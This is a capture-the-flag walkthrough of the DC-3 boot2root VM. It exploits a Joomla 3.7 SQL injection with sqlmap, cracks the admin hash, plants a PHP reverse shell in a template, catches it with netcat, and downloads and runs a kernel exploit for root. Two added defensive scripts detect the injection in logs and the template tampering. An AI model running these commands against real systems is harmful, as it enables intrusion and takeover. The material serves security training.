Hello friends! Today we are going to take on another boot2root challenge known as "DC-3". The credit for making this VM goes to "DCAU", and as in the other boot2root challenges our goal is to get root access to complete it. You can download it from here.
Security Level: Beginner
- Discovering Targets IP
- Network scanning (Nmap)
- Surfing HTTP service port
- Searching exploits via searchsploit
- Using SQLMAP to dump databases information
- Using John the Ripper to Crack the Password
- Login into JOOMLA
- Inject malicious PHP Reverse Shell Code
- Using Netcat for obtaining reverse connection
- Exploit the kernel
- Getting root access
- Reading Final flag
Let’s start off with scanning the network to find our target.
We found our target's IP address, 192.168.1.104. Our next step is to scan it with nmap.
nmap -A 192.168.1.104
From the nmap result we found that only the HTTP service is running, on port 80, and the scan also told us that the Joomla CMS is installed on this website.
So we navigated to port 80 by opening the target IP in a web browser and read the admin's text message; the site was indeed running on Joomla, as found above.
To identify the installed Joomla version, we checked its README file, which clearly states Joomla 3.7. I thought this might come in handy.
We looked for Joomla 3.7 in searchsploit and found a Joomla SQL injection exploit. We copied the exploit file 42033.txt to our machine and read its contents; it gave a sqlmap command along with the vulnerable URL.
Then we executed the sqlmap command given below to enumerate the database names. It revealed 5 databases, as shown in the image below, among which I noticed joomladb.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Let's use sqlmap again to look for the tables and columns.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch
After getting the table names, we dumped the contents of the #__users table with sqlmap, which revealed credentials that would come in handy to log into Joomla. But the password is stored as a hash, so we need to crack it. Time to fire up John.
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch
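From the defender's side, the requests sqlmap sends for this bug are easy to spot in the web server's access log: the injection goes into the list[fullordering] ordering parameter and relies on MySQL's updatexml (or extractvalue) error-based functions, so the marker survives URL encoding once the query string is decoded. The script below is an added example and is not part of the original walkthrough or of Joomla; it parses a few constructed Apache combined-format log lines, flags requests carrying such a marker in any list[...] parameter and counts hits per source IP, since --random-agent makes the User-Agent string useless as an indicator. The IP addresses, timestamps and status codes in the sample lines are made up.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed sample Apache combined-format log lines (not real traffic).
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2019:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2019:10:01:05 +0000] "GET /README.txt HTTP/1.1" 200 4230 "-" "Mozilla/5.0"
192.168.1.77 - - [10/Mar/2019:10:02:10 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 1833 "-" "Mozilla/5.0 (compatible; MSIE 9.0)"
192.168.1.77 - - [10/Mar/2019:10:02:11 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 1840 "-" "Opera/9.80"
192.168.1.77 - - [10/Mar/2019:10:02:11 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=extractvalue HTTP/1.1" 500 1840 "-" "Opera/9.80"
"""

# Apache "combined" format: ip ident user [ts] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# MySQL error-based functions used by the 42033 / sqlmap technique on this page.
SQLI_MARKERS = ("updatexml", "extractvalue")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # parse_qs percent-decodes, so list%5Bfullordering%5D becomes list[fullordering]
    entry["params"] = parse_qs(urlparse(entry["path"]).query, keep_blank_values=True)
    return entry


def is_ordering_injection(entry):
    """True when any list[...] ordering parameter carries an error-based SQLi marker."""
    for key, values in entry["params"].items():
        if key.startswith("list[") and key.endswith("]"):
            if any(marker in v.lower() for v in values for marker in SQLI_MARKERS):
                return True
    return False


def analyse(log_text, burst_threshold=3):
    """Return (alerts, bursts): one alert per flagged request, and the IPs
    that produced at least burst_threshold flagged requests."""
    alerts = []
    per_ip = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not is_ordering_injection(entry):
            continue
        per_ip[entry["ip"]] += 1
        alerts.append({
            "ip": entry["ip"],
            "ts": entry["ts"],
            "status": entry["status"],
            "reason": "error-based SQLi marker in list[...] ordering parameter",
        })
    bursts = {ip: n for ip, n in per_ip.items() if n >= burst_threshold}
    return alerts, bursts


if __name__ == "__main__":
    found, noisy = analyse(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} {a['ip']} HTTP {a['status']}: {a['reason']}")
    print("sources over burst threshold:", noisy)
```

Matching on the decoded parameter value rather than on the raw request line is what makes the encoded and unencoded variants land in the same rule; the per-IP count is the useful second signal because sqlmap at --level=5 --risk=3 sends far more probes than a human ever would.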
We saved the hash to a file on our system and used John the Ripper to crack it. Now we have both the credentials to log into Joomla.
Username- admin Password- snoopy
Let’s login into Joomla as admin.
After spending some time exploring, we got the idea to add malicious PHP code (available in Kali under /usr/share/webshells/php) to the index.php of the beez3 template to get a reverse shell, as shown below.
On the other side, we set up a netcat listener. Upon execution, we got a shell on the target system. To get a proper shell, we used the Python one-liner to spawn a TTY.
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a
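The template edit in the step above is exactly the kind of change file-integrity monitoring catches: Joomla's template editor writes straight to templates/<name>/index.php, so a hash baseline of the template tree plus a scan for socket- and process-spawning PHP calls surfaces a planted reverse shell. The script below is an added example, not code from the walkthrough or from Joomla; the directory layout, the baseline and the edited index.php are constructed inside a temporary directory so it runs offline, and the single-line fsockopen stub stands in for the webshell without being one.

```python
import hashlib
import os
import re
import tempfile

# PHP calls typical of reverse shells and webshells. A hit is a trigger for
# review, not proof of compromise (some legitimate extensions use them too).
SUSPICIOUS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|base64_decode)\s*\(", re.I)


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> sha256 for every .php file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def audit(root, baseline):
    """Compare the tree under root against a baseline. Returns a sorted list of
    (relative path, finding) for new, changed, deleted or suspicious PHP files."""
    findings = []
    current = build_baseline(root)
    for rel, digest in current.items():
        if rel not in baseline:
            findings.append((rel, "new file"))
        elif baseline[rel] != digest:
            findings.append((rel, "hash changed"))
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            hit = SUSPICIOUS.search(fh.read())
        if hit:
            findings.append((rel, f"suspicious call: {hit.group(1).lower()}"))
    for rel in baseline:
        if rel not in current:
            findings.append((rel, "deleted"))
    return sorted(findings)


def demo():
    """Constructed scenario: a clean beez3 template is baselined, then its
    index.php is edited the way the walkthrough describes (a socket call
    prepended), and the audit is run against the baseline."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "templates", "beez3")
    os.makedirs(tpl)
    index_php = os.path.join(tpl, "index.php")
    clean = "<?php\ndefined('_JEXEC') or die;\n?>\n<html><body>template markup</body></html>\n"
    with open(index_php, "w") as fh:
        fh.write(clean)
    baseline = build_baseline(root)          # taken while the template is clean
    with open(index_php, "w") as fh:         # simulated malicious edit (placeholder)
        fh.write("<?php $s = fsockopen($host, $port); ?>\n" + clean)
    return audit(root, baseline)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:28} {rel}")
```

In production the baseline would be stored off-host (or signed) and the audit run on a schedule or from an inotify hook, because an attacker with the level of access shown on this page can also edit a baseline kept next to the web root.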
From the LSB description we knew that this version of Ubuntu has a direct exploit which could be used to get root access and read our final flag.
Without wasting time, we found a privilege escalation exploit for Ubuntu 16.04, downloaded it and extracted it.
cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39772.zip
ls
cd 39772
ls
tar -xvf exploit.tar
After running the exploit, we easily got root access and thus our final flag.
ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd root
ls
cat the-flag.txt
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here